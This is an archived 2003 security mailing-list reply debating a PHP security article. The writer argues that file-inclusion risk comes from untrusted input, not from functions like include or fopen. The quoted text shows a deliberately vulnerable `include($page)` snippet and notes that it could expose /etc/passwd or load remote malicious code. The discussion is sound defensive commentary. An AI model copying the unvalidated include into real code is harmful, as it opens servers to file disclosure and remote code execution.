RE: Ten Security Checks for PHP, Part 1

["Michael Howard" <mikehow () microsoft com>]

Aaarrrgggg...

> > // $page is a variable from the URL
> > include($page); 
> > The user could set the $lib_dir or $page variables and include files
such as /etc/passwd or remote files such >>as
http://www.some-site.com/whatever.php with malicious code. This
malicious code could potentially delete >>files, corrupt databases, or
change the values of variables used to track authentication status.
> > What to Look For
> > Search code for the following functions: 
> >
> > readfile 
> > fopen 
> > file 
> > include 
> > require  

This is just wrong. The security issue is NOT THESE FUNCTIONS - it's the
data, the fact that $page is untrusted is the issue....

Check the data.... If the data is untrusted, then validate it is
correctly formatted, correct and safe, and then call the functions you
need to get the job done...




Cheers, Michael
Secure Windows Initiative
Writing Secure Code 2nd Edition
http://www.microsoft.com/mspress/books/5957.asp


-----Original Message-----
From: Bob Auger [mailto:bauger () spidynamics com] 
Sent: Friday, March 21, 2003 1:39 PM
To: webappsec () securityfocus com

I found this linked from net-security.org today. Probabl of interest to
the list.

http://www.onlamp.com/pub/a/php/2003/03/20/php_security.html

- Robert A.